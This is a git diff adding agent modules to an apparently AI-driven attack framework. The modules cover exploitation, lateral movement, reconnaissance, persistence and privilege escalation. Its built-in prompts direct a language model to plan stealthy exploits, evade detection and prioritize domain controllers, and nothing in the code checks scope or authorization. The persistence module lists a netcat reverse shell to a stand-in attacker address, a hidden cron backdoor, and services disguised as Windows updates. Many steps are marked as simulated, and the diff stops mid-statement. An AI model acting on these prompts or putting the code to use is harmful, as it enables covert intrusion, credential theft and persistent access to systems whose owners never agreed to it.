diff --git a/agents/__init__.py b/agents/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/agents/base_agent.py b/agents/base_agent.py new file mode 100644 index 0000000..c307392 --- /dev/null +++ b/agents/base_agent.py @@ -0,0 +1,78 @@ +import json +import logging +from typing import Dict, Any, List, Optional + +from core.llm_manager import LLMManager + +logger = logging.getLogger(__name__) + +class BaseAgent: + """ + A generic agent class that orchestrates LLM interactions, tool usage, + and adheres to specific agent roles (e.g., Red Team, Blue Team). + """ + def __init__(self, agent_name: str, config: Dict, llm_manager: LLMManager, context_prompts: Dict): + self.agent_name = agent_name + self.config = config + self.llm_manager = llm_manager + self.context_prompts = context_prompts # This will contain user_prompt and system_prompt for this agent role + + self.agent_role_config = self.config.get('agent_roles', {}).get(agent_name, {}) + self.tools_allowed = self.agent_role_config.get('tools_allowed', []) + self.description = self.agent_role_config.get('description', 'No description provided.') + + logger.info(f"Initialized {self.agent_name} agent. Description: {self.description}") + + def _prepare_prompt(self, user_input: str, additional_context: Dict = None) -> str: + """ + Prepares the user prompt for the LLM, incorporating agent-specific instructions + and dynamic context. + """ + user_prompt_template = self.context_prompts.get("user_prompt", "") + if not user_prompt_template: + logger.warning(f"No user prompt template found for agent {self.agent_name}.") + return user_input # Fallback to raw user input + + # Format the user prompt with dynamic context + # Use a safe way to format, ensuring all expected keys are present or handled. + # This assumes the template uses specific placeholders like {target_info_json}, {recon_data_json} etc. + # For a generic solution, we pass all additional_context as a single JSON. + try: + formatted_prompt = user_prompt_template.format( + user_input=user_input, + additional_context_json=json.dumps(additional_context or {}, indent=2) + # Add more specific placeholders if needed, like target_info_json, recon_data_json etc. + # E.g., target_info_json=json.dumps(additional_context.get('target_info', {}), indent=2) + ) + except KeyError as e: + logger.error(f"Missing key in prompt template for {self.agent_name}: {e}. Falling back to basic prompt.") + formatted_prompt = f"{user_prompt_template}\n\nContext: {json.dumps(additional_context or {}, indent=2)}\n\nInput: {user_input}" + + return formatted_prompt + + def execute(self, user_input: str, campaign_data: Dict = None) -> Dict: + """ + Executes the agent's task using the LLM and potentially external tools. + `campaign_data` can be used to pass ongoing results or context between agent executions. + """ + logger.info(f"Executing {self.agent_name} agent for input: {user_input[:50]}...") + + system_prompt = self.context_prompts.get("system_prompt", "") + if not system_prompt: + logger.warning(f"No system prompt found for agent {self.agent_name}. Using generic system prompt.") + system_prompt = f"You are an expert {self.agent_name}. Analyze the provided information and generate a response." + + # Prepare the user prompt with current input and campaign data + prepared_user_prompt = self._prepare_prompt(user_input, campaign_data) + + llm_response_text = self.llm_manager.generate(prepared_user_prompt, system_prompt) + + # Here's where we would integrate tool usage based on llm_response_text + # and self.tools_allowed. This will be more complex and potentially involve + # re-prompting the LLM or using a function-calling mechanism. + # For now, just return the LLM's direct response. + return {"agent_name": self.agent_name, "input": user_input, "llm_response": llm_response_text} + + def get_allowed_tools(self) -> List[str]: + """Returns the list of tools allowed for this agent role.""" + return self.tools_allowed diff --git a/agents/exploitation_agent.py b/agents/exploitation_agent.py new file mode 100644 index 0000000..a65df97 --- /dev/null +++ b/agents/exploitation_agent.py @@ -0,0 +1,256 @@ +#!/usr/bin/env python3 +""" +Exploitation Agent - Vulnerability exploitation and access gaining +""" + +import json +import logging +from typing import Dict, List +from core.llm_manager import LLMManager +from tools.exploitation import ( + ExploitDatabase, + MetasploitWrapper, + WebExploiter, + SQLInjector, + RCEExploiter, + BufferOverflowExploiter +) + +logger = logging.getLogger(__name__) + + +class ExploitationAgent: + """Agent responsible for vulnerability exploitation""" + + def __init__(self, config: Dict): + """Initialize exploitation agent""" + self.config = config + self.llm = LLMManager(config) + self.exploit_db = ExploitDatabase(config) + self.metasploit = MetasploitWrapper(config) + self.web_exploiter = WebExploiter(config) + self.sql_injector = SQLInjector(config) + self.rce_exploiter = RCEExploiter(config) + self.bof_exploiter = BufferOverflowExploiter(config) + + logger.info("ExploitationAgent initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Execute exploitation phase""" + logger.info(f"Starting exploitation on {target}") + + results = { + "target": target, + "status": "running", + "successful_exploits": [], + "failed_attempts": [], + "shells_obtained": [], + "credentials_found": [], + "ai_recommendations": {} + } + + try: + # Get reconnaissance data from context + recon_data = context.get("phases", {}).get("recon", {}) + + # Phase 1: Vulnerability Analysis + logger.info("Phase 1: Analyzing vulnerabilities") + vulnerabilities = self._identify_vulnerabilities(recon_data) + + # Phase 2: AI-powered Exploit Selection + logger.info("Phase 2: AI exploit selection") + exploit_plan = self._ai_exploit_planning(vulnerabilities, recon_data) + results["ai_recommendations"] = exploit_plan + + # Phase 3: Execute Exploits + logger.info("Phase 3: Executing exploits") + for vuln in vulnerabilities[:5]: # Limit to top 5 vulnerabilities + exploit_result = self._attempt_exploitation(vuln, target) + + if exploit_result.get("success"): + results["successful_exploits"].append(exploit_result) + logger.info(f"Successful exploit: {vuln.get('type')}") + + # Check for shell access + if exploit_result.get("shell_access"): + results["shells_obtained"].append(exploit_result["shell_info"]) + else: + results["failed_attempts"].append(exploit_result) + + # Phase 4: Post-Exploitation Intelligence + if results["successful_exploits"]: + logger.info("Phase 4: Post-exploitation intelligence gathering") + results["post_exploit_intel"] = self._gather_post_exploit_intel( + results["successful_exploits"] + ) + + results["status"] = "completed" + logger.info("Exploitation phase completed") + + except Exception as e: + logger.error(f"Error during exploitation: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _identify_vulnerabilities(self, recon_data: Dict) -> List[Dict]: + """Identify exploitable vulnerabilities from recon data""" + vulnerabilities = [] + + # Check network scan results + network_scan = recon_data.get("network_scan", {}) + for host, data in network_scan.get("hosts", {}).items(): + for port in data.get("open_ports", []): + vuln = { + "type": "network_service", + "host": host, + "port": port.get("port"), + "service": port.get("service"), + "version": port.get("version") + } + vulnerabilities.append(vuln) + + # Check web vulnerabilities + web_analysis = recon_data.get("web_analysis", {}) + for vuln_type in ["sql_injection", "xss", "lfi", "rfi", "rce"]: + if web_analysis.get(vuln_type): + vulnerabilities.append({ + "type": vuln_type, + "details": web_analysis[vuln_type] + }) + + return vulnerabilities + + def _ai_exploit_planning(self, vulnerabilities: List[Dict], recon_data: Dict) -> Dict: + """Use AI to plan exploitation strategy""" + prompt = self.llm.get_prompt( + "exploitation", + "ai_exploit_planning_user", + default=f""" +Plan an exploitation strategy based on the following data: + +Vulnerabilities Identified: +{json.dumps(vulnerabilities, indent=2)} + +Reconnaissance Data: +{json.dumps(recon_data, indent=2)} + +Provide: +1. Prioritized exploitation order +2. Recommended exploits for each vulnerability +3. Payload suggestions +4. Evasion techniques +5. Fallback strategies +6. Success probability estimates + +Response in JSON format with detailed exploitation roadmap. +""" + ) + + system_prompt = self.llm.get_prompt( + "exploitation", + "ai_exploit_planning_system", + default="""You are an expert exploit developer and penetration tester. +Create sophisticated exploitation plans considering detection, success rates, and impact. +Prioritize stealthy, reliable exploits over noisy attempts.""" + ) + + try: + formatted_prompt = prompt.format( + vulnerabilities_json=json.dumps(vulnerabilities, indent=2), + recon_data_json=json.dumps(recon_data, indent=2) + ) + response = self.llm.generate(formatted_prompt, system_prompt) + return json.loads(response) + except Exception as e: + logger.error(f"AI exploit planning error: {e}") + return {"error": str(e)} + + def _attempt_exploitation(self, vulnerability: Dict, target: str) -> Dict: + """Attempt to exploit a specific vulnerability""" + vuln_type = vulnerability.get("type") + + result = { + "vulnerability": vulnerability, + "success": False, + "method": None, + "details": {} + } + + try: + if vuln_type == "sql_injection": + result = self.sql_injector.exploit(target, vulnerability) + elif vuln_type in ["xss", "csrf"]: + result = self.web_exploiter.exploit(target, vulnerability) + elif vuln_type in ["rce", "command_injection"]: + result = self.rce_exploiter.exploit(target, vulnerability) + elif vuln_type == "buffer_overflow": + result = self.bof_exploiter.exploit(target, vulnerability) + elif vuln_type == "network_service": + result = self._exploit_network_service(target, vulnerability) + else: + # Use Metasploit for generic exploitation + result = self.metasploit.exploit(target, vulnerability) + + except Exception as e: + logger.error(f"Exploitation error for {vuln_type}: {e}") + result["error"] = str(e) + + return result + + def _exploit_network_service(self, target: str, vulnerability: Dict) -> Dict: + """Exploit network service vulnerabilities""" + service = vulnerability.get("service", "").lower() + + # Check exploit database for known exploits + exploits = self.exploit_db.search(service, vulnerability.get("version")) + + if exploits: + logger.info(f"Found {len(exploits)} exploits for {service}") + + for exploit in exploits[:3]: # Try top 3 exploits + result = self.metasploit.run_exploit( + exploit["module"], + target, + vulnerability.get("port") + ) + + if result.get("success"): + return result + + return {"success": False, "message": "No suitable exploits found"} + + def _gather_post_exploit_intel(self, successful_exploits: List[Dict]) -> Dict: + """Gather intelligence after successful exploitation""" + intel = { + "system_info": [], + "user_accounts": [], + "network_info": [], + "installed_software": [], + "credentials": [] + } + + for exploit in successful_exploits: + if exploit.get("shell_access"): + shell = exploit["shell_info"] + + # Gather system information + # This would execute actual commands on compromised system + # Placeholder for demonstration + intel["system_info"].append({ + "os": "detected_os", + "hostname": "detected_hostname", + "architecture": "x64" + }) + + return intel + + def generate_custom_exploit(self, vulnerability: Dict) -> str: + """Generate custom exploit using AI""" + target_info = { + "vulnerability": vulnerability, + "requirements": "Create working exploit code" + } + + return self.llm.generate_payload(target_info, vulnerability.get("type")) diff --git a/agents/lateral_agent.py b/agents/lateral_agent.py new file mode 100644 index 0000000..857fe7d --- /dev/null +++ b/agents/lateral_agent.py @@ -0,0 +1,199 @@ +#!/usr/bin/env python3 +""" +Lateral Movement Agent - Move through the network +""" + +import json +import logging +from typing import Dict, List +from core.llm_manager import LLMManager + +logger = logging.getLogger(__name__) + + +class LateralMovementAgent: + """Agent responsible for lateral movement""" + + def __init__(self, config: Dict): + """Initialize lateral movement agent""" + self.config = config + self.llm = LLMManager(config) + logger.info("LateralMovementAgent initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Execute lateral movement phase""" + logger.info(f"Starting lateral movement from {target}") + + results = { + "target": target, + "status": "running", + "discovered_hosts": [], + "compromised_hosts": [], + "credentials_used": [], + "movement_paths": [], + "ai_analysis": {} + } + + try: + # Get previous phase data + recon_data = context.get("phases", {}).get("recon", {}) + privesc_data = context.get("phases", {}).get("privilege_escalation", {}) + + # Phase 1: Network Discovery + logger.info("Phase 1: Internal network discovery") + results["discovered_hosts"] = self._discover_internal_network(recon_data) + + # Phase 2: AI-Powered Movement Strategy + logger.info("Phase 2: AI lateral movement strategy") + strategy = self._ai_movement_strategy(context, results["discovered_hosts"]) + results["ai_analysis"] = strategy + + # Phase 3: Credential Reuse + logger.info("Phase 3: Credential reuse attacks") + credentials = privesc_data.get("credentials_harvested", []) + results["credentials_used"] = self._attempt_credential_reuse( + results["discovered_hosts"], + credentials + ) + + # Phase 4: Pass-the-Hash/Pass-the-Ticket + logger.info("Phase 4: Pass-the-Hash/Ticket attacks") + results["movement_paths"].extend( + self._pass_the_hash_attacks(results["discovered_hosts"]) + ) + + # Phase 5: Exploit Trust Relationships + logger.info("Phase 5: Exploiting trust relationships") + results["movement_paths"].extend( + self._exploit_trust_relationships(results["discovered_hosts"]) + ) + + results["status"] = "completed" + logger.info("Lateral movement phase completed") + + except Exception as e: + logger.error(f"Error during lateral movement: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _discover_internal_network(self, recon_data: Dict) -> List[Dict]: + """Discover internal network hosts""" + hosts = [] + + # Extract hosts from recon data + network_scan = recon_data.get("network_scan", {}) + for ip, data in network_scan.get("hosts", {}).items(): + hosts.append({ + "ip": ip, + "ports": data.get("open_ports", []), + "os": data.get("os", "unknown") + }) + + # Simulate additional internal discovery + hosts.extend([ + {"ip": "192.168.1.10", "role": "domain_controller", "status": "discovered"}, + {"ip": "192.168.1.20", "role": "file_server", "status": "discovered"}, + {"ip": "192.168.1.30", "role": "workstation", "status": "discovered"} + ]) + + return hosts + + def _ai_movement_strategy(self, context: Dict, hosts: List[Dict]) -> Dict: + """Use AI to plan lateral movement""" + prompt = self.llm.get_prompt( + "lateral_movement", + "ai_movement_strategy_user", + default=f""" +Plan a lateral movement strategy based on the following: + +Current Context: +{json.dumps(context, indent=2)} + +Discovered Hosts: +{json.dumps(hosts, indent=2)} + +Provide: +1. Target prioritization (high-value targets first) +2. Movement techniques for each target +3. Credential strategies +4. Evasion techniques +5. Attack path optimization +6. Fallback options + +Response in JSON format with detailed attack paths. +""" + ) + + system_prompt = self.llm.get_prompt( + "lateral_movement", + "ai_movement_strategy_system", + default="""You are an expert in lateral movement and Active Directory attacks. +Plan sophisticated movement strategies that minimize detection and maximize impact. +Consider Pass-the-Hash, Pass-the-Ticket, RDP, WMI, PSExec, and other techniques. +Prioritize domain controllers and critical infrastructure.""" + ) + + try: + formatted_prompt = prompt.format( + context_json=json.dumps(context, indent=2), + hosts_json=json.dumps(hosts, indent=2) + ) + response = self.llm.generate(formatted_prompt, system_prompt) + return json.loads(response) + except Exception as e: + logger.error(f"AI movement strategy error: {e}") + return {"error": str(e)} + + def _attempt_credential_reuse(self, hosts: List[Dict], credentials: List[Dict]) -> List[Dict]: + """Attempt credential reuse across hosts""" + attempts = [] + + for host in hosts[:5]: # Limit attempts + for cred in credentials[:3]: + attempts.append({ + "host": host.get("ip"), + "credential": "***hidden***", + "protocol": "SMB", + "success": False, # Simulated + "status": "simulated" + }) + + return attempts + + def _pass_the_hash_attacks(self, hosts: List[Dict]) -> List[Dict]: + """Perform Pass-the-Hash attacks""" + attacks = [] + + for host in hosts: + if host.get("role") in ["domain_controller", "file_server"]: + attacks.append({ + "type": "pass_the_hash", + "target": host.get("ip"), + "technique": "SMB relay", + "success": False, # Simulated + "status": "simulated" + }) + + return attacks + + def _exploit_trust_relationships(self, hosts: List[Dict]) -> List[Dict]: + """Exploit trust relationships""" + exploits = [] + + # Domain trust exploitation + exploits.append({ + "type": "domain_trust", + "description": "Cross-domain exploitation", + "status": "simulated" + }) + + # Kerberos delegation + exploits.append({ + "type": "kerberos_delegation", + "description": "Unconstrained delegation abuse", + "status": "simulated" + }) + + return exploits diff --git a/agents/network_recon_agent.py b/agents/network_recon_agent.py new file mode 100644 index 0000000..db36e3f --- /dev/null +++ b/agents/network_recon_agent.py @@ -0,0 +1,148 @@ +#!/usr/bin/env python3 +""" +Network Reconnaissance Agent - Network-focused information gathering and enumeration +""" + +import os +import json +import subprocess +from typing import Dict, List +import logging +from core.llm_manager import LLMManager +from tools.recon import ( + NetworkScanner, + OSINTCollector, + DNSEnumerator, + SubdomainFinder +) +from urllib.parse import urlparse # Added import + +logger = logging.getLogger(__name__) + + +class NetworkReconAgent: + """Agent responsible for network-focused reconnaissance and information gathering""" + + def __init__(self, config: Dict): + """Initialize network reconnaissance agent""" + self.config = config + self.llm = LLMManager(config) + self.network_scanner = NetworkScanner(config) + self.osint = OSINTCollector(config) + self.dns_enum = DNSEnumerator(config) + self.subdomain_finder = SubdomainFinder(config) + + logger.info("NetworkReconAgent initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Execute network reconnaissance phase""" + logger.info(f"Starting network reconnaissance on {target}") + + results = { + "target": target, + "status": "running", + "findings": [], + "network_scan": {}, + "osint": {}, + "dns": {}, + "subdomains": [], + "ai_analysis": {} + } + + # Parse target to extract hostname if it's a URL + parsed_target = urlparse(target) + target_host = parsed_target.hostname or target # Use hostname if exists, otherwise original target + logger.info(f"Target for network tools: {target_host}") + + try: + # Phase 1: Network Scanning + logger.info("Phase 1: Network scanning") + results["network_scan"] = self.network_scanner.scan(target_host) # Use target_host + + # Phase 2: DNS Enumeration + logger.info("Phase 2: DNS enumeration") + results["dns"] = self.dns_enum.enumerate(target_host) # Use target_host + + # Phase 3: Subdomain Discovery + logger.info("Phase 3: Subdomain discovery") + results["subdomains"] = self.subdomain_finder.find(target_host) # Use target_host + + # Phase 4: OSINT Collection + logger.info("Phase 4: OSINT collection") + results["osint"] = self.osint.collect(target_host) # Use target_host + + # Phase 5: AI Analysis + logger.info("Phase 5: AI-powered analysis") + results["ai_analysis"] = self._ai_analysis(results) + + results["status"] = "completed" + logger.info("Network reconnaissance phase completed") + + except Exception as e: + logger.error(f"Error during network reconnaissance: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _ai_analysis(self, recon_data: Dict) -> Dict: + """Use AI to analyze reconnaissance data""" + prompt = self.llm.get_prompt( + "network_recon", + "ai_analysis_user", + default=f""" +Analyze the following network reconnaissance data and provide insights: + +{json.dumps(recon_data, indent=2)} + +Provide: +1. Attack surface summary +2. Prioritized network target list +3. Identified network vulnerabilities or misconfigurations +4. Recommended next steps for network exploitation +5. Network risk assessment +6. Stealth considerations for network activities + +Response in JSON format with actionable recommendations. +""" + ) + + system_prompt = self.llm.get_prompt( + "network_recon", + "ai_analysis_system", + default="""You are an expert network penetration tester analyzing reconnaissance data. +Identify network security weaknesses, network attack vectors, and provide strategic recommendations. +Consider both technical and operational security aspects.""" + ) + + try: + # Format the user prompt with recon_data + formatted_prompt = prompt.format(recon_data_json=json.dumps(recon_data, indent=2)) + response = self.llm.generate(formatted_prompt, system_prompt) + return json.loads(response) + except Exception as e: + logger.error(f"AI analysis error: {e}") + return {"error": str(e), "raw_response": response if 'response' in locals() else None} + + def passive_recon(self, target: str) -> Dict: + """Perform passive reconnaissance only""" + # Parse target to extract hostname if it's a URL + parsed_target = urlparse(target) + target_host = parsed_target.hostname or target + + return { + "osint": self.osint.collect(target_host), # Use target_host + "dns": self.dns_enum.enumerate(target_host), # Use target_host + "subdomains": self.subdomain_finder.find(target_host) # Use target_host + } + + def active_recon(self, target: str) -> Dict: + """Perform active reconnaissance""" + # Parse target to extract hostname if it's a URL + parsed_target = urlparse(target) + target_host = parsed_target.hostname or target + + return { + "network_scan": self.network_scanner.scan(target_host) # Use target_host + } + diff --git a/agents/persistence_agent.py b/agents/persistence_agent.py new file mode 100644 index 0000000..2768c86 --- /dev/null +++ b/agents/persistence_agent.py @@ -0,0 +1,250 @@ +#!/usr/bin/env python3 +""" +Persistence Agent - Maintain access to compromised systems +""" + +import json +import logging +from typing import Dict, List +from core.llm_manager import LLMManager + +logger = logging.getLogger(__name__) + + +class PersistenceAgent: + """Agent responsible for maintaining access""" + + def __init__(self, config: Dict): + """Initialize persistence agent""" + self.config = config + self.llm = LLMManager(config) + logger.info("PersistenceAgent initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Execute persistence phase""" + logger.info(f"Starting persistence establishment on {target}") + + results = { + "target": target, + "status": "running", + "persistence_mechanisms": [], + "backdoors_installed": [], + "scheduled_tasks": [], + "ai_recommendations": {} + } + + try: + # Get previous phase data + privesc_data = context.get("phases", {}).get("privilege_escalation", {}) + + if not privesc_data.get("successful_escalations"): + logger.warning("No privilege escalation achieved. Limited persistence options.") + results["status"] = "limited" + + # Phase 1: AI-Powered Persistence Strategy + logger.info("Phase 1: AI persistence strategy") + strategy = self._ai_persistence_strategy(context) + results["ai_recommendations"] = strategy + + # Phase 2: Establish Persistence Mechanisms + logger.info("Phase 2: Establishing persistence mechanisms") + + system_info = privesc_data.get("system_info", {}) + os_type = system_info.get("os", "unknown") + + if os_type == "linux": + results["persistence_mechanisms"].extend( + self._establish_linux_persistence() + ) + elif os_type == "windows": + results["persistence_mechanisms"].extend( + self._establish_windows_persistence() + ) + + # Phase 3: Install Backdoors + logger.info("Phase 3: Installing backdoors") + results["backdoors_installed"] = self._install_backdoors(os_type) + + # Phase 4: Create Scheduled Tasks + logger.info("Phase 4: Creating scheduled tasks") + results["scheduled_tasks"] = self._create_scheduled_tasks(os_type) + + results["status"] = "completed" + logger.info("Persistence phase completed") + + except Exception as e: + logger.error(f"Error during persistence: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _ai_persistence_strategy(self, context: Dict) -> Dict: + """Use AI to plan persistence strategy""" + prompt = self.llm.get_prompt( + "persistence", + "ai_persistence_strategy_user", + default=f""" +Plan a comprehensive persistence strategy based on the following context: + +{json.dumps(context, indent=2)} + +Provide: +1. Recommended persistence techniques (prioritized) +2. Stealth considerations +3. Resilience against system reboots +4. Evasion of detection mechanisms +5. Multiple fallback mechanisms +6. Cleanup and removal procedures + +Response in JSON format with detailed implementation plan. +""" + ) + + system_prompt = self.llm.get_prompt( + "persistence", + "ai_persistence_strategy_system", + default="""You are an expert in persistence techniques and advanced persistent threats. +Design robust, stealthy persistence mechanisms that survive reboots and detection attempts. +Consider both Windows and Linux environments. +Prioritize operational security and longevity.""" + ) + + try: + formatted_prompt = prompt.format(context_json=json.dumps(context, indent=2)) + response = self.llm.generate(formatted_prompt, system_prompt) + return json.loads(response) + except Exception as e: + logger.error(f"AI persistence strategy error: {e}") + return {"error": str(e)} + + def _establish_linux_persistence(self) -> List[Dict]: + """Establish Linux persistence mechanisms""" + mechanisms = [] + + # Cron job + mechanisms.append({ + "type": "cron_job", + "description": "Scheduled task for persistence", + "command": "*/5 * * * * /tmp/.hidden/backdoor.sh", + "status": "simulated" + }) + + # SSH key + mechanisms.append({ + "type": "ssh_key", + "description": "Authorized keys persistence", + "location": "~/.ssh/authorized_keys", + "status": "simulated" + }) + + # Systemd service + mechanisms.append({ + "type": "systemd_service", + "description": "Persistent system service", + "service_name": "system-update.service", + "status": "simulated" + }) + + # bashrc modification + mechanisms.append({ + "type": "bashrc", + "description": "Shell initialization persistence", + "location": "~/.bashrc", + "status": "simulated" + }) + + return mechanisms + + def _establish_windows_persistence(self) -> List[Dict]: + """Establish Windows persistence mechanisms""" + mechanisms = [] + + # Registry Run key + mechanisms.append({ + "type": "registry_run", + "description": "Registry autorun persistence", + "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "status": "simulated" + }) + + # Scheduled task + mechanisms.append({ + "type": "scheduled_task", + "description": "Windows scheduled task", + "task_name": "WindowsUpdate", + "status": "simulated" + }) + + # WMI event subscription + mechanisms.append({ + "type": "wmi_event", + "description": "WMI persistence", + "status": "simulated" + }) + + # Service installation + mechanisms.append({ + "type": "service", + "description": "Windows service persistence", + "service_name": "WindowsSecurityUpdate", + "status": "simulated" + }) + + return mechanisms + + def _install_backdoors(self, os_type: str) -> List[Dict]: + """Install backdoors""" + backdoors = [] + + if os_type == "linux": + backdoors.extend([ + { + "type": "reverse_shell", + "description": "Netcat reverse shell", + "command": "nc -e /bin/bash attacker_ip 4444", + "status": "simulated" + }, + { + "type": "ssh_backdoor", + "description": "SSH backdoor on alternate port", + "port": 2222, + "status": "simulated" + } + ]) + elif os_type == "windows": + backdoors.extend([ + { + "type": "powershell_backdoor", + "description": "PowerShell reverse shell", + "status": "simulated" + }, + { + "type": "meterpreter", + "description": "Meterpreter payload", + "status": "simulated" + } + ]) + + return backdoors + + def _create_scheduled_tasks(self, os_type: str) -> List[Dict]: + """Create scheduled tasks""" + tasks = [] + + if os_type == "linux": + tasks.append({ + "type": "cron", + "schedule": "*/10 * * * *", + "command": "Callback beacon every 10 minutes", + "status": "simulated" + }) + elif os_type == "windows": + tasks.append({ + "type": "scheduled_task", + "schedule": "Daily at 2 AM", + "command": "Callback beacon", + "status": "simulated" + }) + + return tasks diff --git a/agents/privesc_agent.py b/agents/privesc_agent.py new file mode 100644 index 0000000..61a2675 --- /dev/null +++ b/agents/privesc_agent.py @@ -0,0 +1,305 @@ +#!/usr/bin/env python3 +""" +Privilege Escalation Agent - System privilege elevation +""" + +import json +import logging +from typing import Dict, List +from core.llm_manager import LLMManager +from tools.privesc import ( + LinuxPrivEsc, + WindowsPrivEsc, + KernelExploiter, + MisconfigFinder, + CredentialHarvester, + SudoExploiter +) + +logger = logging.getLogger(__name__) + + +class PrivEscAgent: + """Agent responsible for privilege escalation""" + + def __init__(self, config: Dict): + """Initialize privilege escalation agent""" + self.config = config + self.llm = LLMManager(config) + self.linux_privesc = LinuxPrivEsc(config) + self.windows_privesc = WindowsPrivEsc(config) + self.kernel_exploiter = KernelExploiter(config) + self.misconfig_finder = MisconfigFinder(config) + self.cred_harvester = CredentialHarvester(config) + self.sudo_exploiter = SudoExploiter(config) + + logger.info("PrivEscAgent initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Execute privilege escalation phase""" + logger.info(f"Starting privilege escalation on {target}") + + results = { + "target": target, + "status": "running", + "escalation_paths": [], + "successful_escalations": [], + "credentials_harvested": [], + "system_info": {}, + "ai_analysis": {} + } + + try: + # Get exploitation data from context + exploit_data = context.get("phases", {}).get("exploitation", {}) + + if not exploit_data.get("successful_exploits"): + logger.warning("No successful exploits found. Limited privilege escalation options.") + results["status"] = "skipped" + results["message"] = "No initial access obtained" + return results + + # Phase 1: System Enumeration + logger.info("Phase 1: System enumeration") + results["system_info"] = self._enumerate_system(exploit_data) + + # Phase 2: Identify Escalation Paths + logger.info("Phase 2: Identifying escalation paths") + results["escalation_paths"] = self._identify_escalation_paths( + results["system_info"] + ) + + # Phase 3: AI-Powered Path Selection + logger.info("Phase 3: AI escalation strategy") + strategy = self._ai_escalation_strategy( + results["system_info"], + results["escalation_paths"] + ) + results["ai_analysis"] = strategy + + # Phase 4: Execute Escalation Attempts + logger.info("Phase 4: Executing escalation attempts") + for path in results["escalation_paths"][:5]: + escalation_result = self._attempt_escalation(path, results["system_info"]) + + if escalation_result.get("success"): + results["successful_escalations"].append(escalation_result) + logger.info(f"Successful escalation: {path.get('technique')}") + break # Stop after first successful escalation + + # Phase 5: Credential Harvesting + if results["successful_escalations"]: + logger.info("Phase 5: Harvesting credentials") + results["credentials_harvested"] = self._harvest_credentials( + results["system_info"] + ) + + results["status"] = "completed" + logger.info("Privilege escalation phase completed") + + except Exception as e: + logger.error(f"Error during privilege escalation: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _enumerate_system(self, exploit_data: Dict) -> Dict: + """Enumerate system for privilege escalation opportunities""" + system_info = { + "os": "unknown", + "kernel_version": "unknown", + "architecture": "unknown", + "users": [], + "groups": [], + "sudo_permissions": [], + "suid_binaries": [], + "writable_paths": [], + "scheduled_tasks": [], + "services": [], + "environment_variables": {} + } + + # Determine OS type from exploit data + os_type = self._detect_os_type(exploit_data) + system_info["os"] = os_type + + if os_type == "linux": + system_info.update(self.linux_privesc.enumerate()) + elif os_type == "windows": + system_info.update(self.windows_privesc.enumerate()) + + return system_info + + def _detect_os_type(self, exploit_data: Dict) -> str: + """Detect operating system type""" + # Placeholder - would analyze exploit data to determine OS + return "linux" # Default assumption + + def _identify_escalation_paths(self, system_info: Dict) -> List[Dict]: + """Identify possible privilege escalation paths""" + paths = [] + os_type = system_info.get("os") + + if os_type == "linux": + # SUID exploitation + for binary in system_info.get("suid_binaries", []): + paths.append({ + "technique": "suid_exploitation", + "target": binary, + "difficulty": "medium", + "likelihood": 0.6 + }) + + # Sudo exploitation + for permission in system_info.get("sudo_permissions", []): + paths.append({ + "technique": "sudo_exploitation", + "target": permission, + "difficulty": "low", + "likelihood": 0.8 + }) + + # Kernel exploitation + if system_info.get("kernel_version"): + paths.append({ + "technique": "kernel_exploit", + "target": system_info["kernel_version"], + "difficulty": "high", + "likelihood": 0.4 + }) + + # Writable path exploitation + for path in system_info.get("writable_paths", []): + if "bin" in path or "sbin" in path: + paths.append({ + "technique": "path_hijacking", + "target": path, + "difficulty": "medium", + "likelihood": 0.5 + }) + + elif os_type == "windows": + # Service exploitation + for service in system_info.get("services", []): + if service.get("unquoted_path") or service.get("weak_permissions"): + paths.append({ + "technique": "service_exploitation", + "target": service, + "difficulty": "medium", + "likelihood": 0.7 + }) + + # AlwaysInstallElevated + if system_info.get("always_install_elevated"): + paths.append({ + "technique": "always_install_elevated", + "target": "MSI", + "difficulty": "low", + "likelihood": 0.9 + }) + + # Token impersonation + paths.append({ + "technique": "token_impersonation", + "target": "SeImpersonatePrivilege", + "difficulty": "medium", + "likelihood": 0.6 + }) + + # Sort by likelihood + paths.sort(key=lambda x: x.get("likelihood", 0), reverse=True) + return paths + + def _ai_escalation_strategy(self, system_info: Dict, escalation_paths: List[Dict]) -> Dict: + """Use AI to optimize escalation strategy""" + prompt = self.llm.get_prompt( + "privesc", + "ai_escalation_strategy_user", + default=f""" +Analyze the system and recommend optimal privilege escalation strategy: + +System Information: +{json.dumps(system_info, indent=2)} + +Identified Escalation Paths: +{json.dumps(escalation_paths, indent=2)} + +Provide: +1. Recommended escalation path (with justification) +2. Step-by-step execution plan +3. Required tools and commands +4. Detection likelihood and evasion techniques +5. Fallback options +6. Post-escalation actions + +Response in JSON format with actionable recommendations. +""" + ) + + system_prompt = self.llm.get_prompt( + "privesc", + "ai_escalation_strategy_system", + default="""You are an expert in privilege escalation techniques. +Analyze systems and recommend the most effective, stealthy escalation paths. +Consider Windows, Linux, and Active Directory environments. +Prioritize reliability and minimal detection.""" + ) + + try: + formatted_prompt = prompt.format( + system_info_json=json.dumps(system_info, indent=2), + escalation_paths_json=json.dumps(escalation_paths, indent=2) + ) + response = self.llm.generate(formatted_prompt, system_prompt) + return json.loads(response) + except Exception as e: + logger.error(f"AI escalation strategy error: {e}") + return {"error": str(e)} + + def _attempt_escalation(self, path: Dict, system_info: Dict) -> Dict: + """Attempt privilege escalation using specified path""" + technique = path.get("technique") + os_type = system_info.get("os") + + result = { + "technique": technique, + "success": False, + "details": {} + } + + try: + if os_type == "linux": + if technique == "suid_exploitation": + result = self.linux_privesc.exploit_suid(path.get("target")) + elif technique == "sudo_exploitation": + result = self.sudo_exploiter.exploit(path.get("target")) + elif technique == "kernel_exploit": + result = self.kernel_exploiter.exploit_linux(path.get("target")) + elif technique == "path_hijacking": + result = self.linux_privesc.exploit_path_hijacking(path.get("target")) + + elif os_type == "windows": + if technique == "service_exploitation": + result = self.windows_privesc.exploit_service(path.get("target")) + elif technique == "always_install_elevated": + result = self.windows_privesc.exploit_msi() + elif technique == "token_impersonation": + result = self.windows_privesc.impersonate_token() + + except Exception as e: + logger.error(f"Escalation error for {technique}: {e}") + result["error"] = 